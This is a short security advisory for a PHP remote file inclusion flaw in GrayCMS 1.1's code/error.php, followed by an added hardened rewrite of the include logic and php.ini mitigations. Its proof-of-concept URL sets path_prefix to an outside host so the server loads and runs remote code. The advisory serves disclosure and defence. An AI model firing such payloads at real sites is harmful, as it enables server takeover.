
GrayCMS PHP code injection




Version:  1.1
Severity: High
Vendor:   http://gcms.graymur.net/

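Vulnerable code is in "code/error.php", where $path_prefix gets a default value only if it is not already set and is then used to build the paths passed to require: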

<----begin---->
...
if (!isset($page)) $page = '';
if (!isset($path_prefix)) $path_prefix = '../';
if (empty($main)) {
  require $path_prefix.'code/main.dat';
}
if (isset($e404) or isset($_GET['e404'])) {

...
}
if (isset($e403) or isset($_GET['e403'])) {
...
}

require $path_prefix.'code/blocks.php';
exit;
<----end---->


PoC: 
http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/
 
mail me:    maggik <at> gala <dot> net
icq:        3316667
greetz to:  ghc, 0xdeadbabe, unl0ck & others
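
Added example, not part of the original advisory and not GrayCMS code: one way to harden the include logic shown above, by deriving the include base from the file's own location and refusing any path that is a URL or resolves outside the install root. GCMS_ROOT and gcms_local_path() are hypothetical names, and the install layout (error.php inside <install root>/code/) is assumed from the path given in the advisory.

```php
<?php
// Added example, not GrayCMS code. Assumption: this file sits in
// <install root>/code/, as "code/error.php" in the advisory suggests.

// Include base derived from this file's location on disk. Unlike
// $path_prefix, a request parameter can never define or override it.
define('GCMS_ROOT', dirname(dirname(__FILE__)));

// Hypothetical helper: canonical path of $candidate if it is an existing
// local file below GCMS_ROOT, false otherwise.
function gcms_local_path($candidate)
{
    // Refuse URL and stream-wrapper forms (http://, ftp://, php://, data:).
    // Two or more scheme characters, so a Windows drive letter still passes.
    if (preg_match('#^[a-z][a-z0-9+.-]+:#i', $candidate)) {
        return false;
    }
    $root = realpath(GCMS_ROOT);
    $real = realpath($candidate);      // false when nothing exists there
    if ($root === false || $real === false) {
        return false;
    }
    // The resolved path must stay inside the install root.
    $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strpos($real, $root) === 0 ? $real : false;
}

if (PHP_SAPI === 'cli') {
    // Constructed check: the advisory's PoC prefix, then a real local file.
    $poc = 'http://www.kiddiehost.com/' . 'code/blocks.php';
    var_dump(gcms_local_path($poc));
    var_dump(gcms_local_path(__FILE__) !== false);
    exit;
}

// Web request: resolve both includes before either one is used.
$main_file   = gcms_local_path(GCMS_ROOT . '/code/main.dat');
$blocks_file = gcms_local_path(GCMS_ROOT . '/code/blocks.php');
if ($main_file === false || $blocks_file === false) {
    header('HTTP/1.0 500 Internal Server Error');
    exit;
}
if (empty($main)) {
    require $main_file;
}
// ... e404 / e403 handling from the original file goes here ...
require $blocks_file;
exit;
```

The PoC depends on PHP filling $path_prefix from the query string and on remote includes being permitted, so setting register_globals, allow_url_fopen and allow_url_include to Off in php.ini removes both preconditions on hosts that cannot be patched immediately.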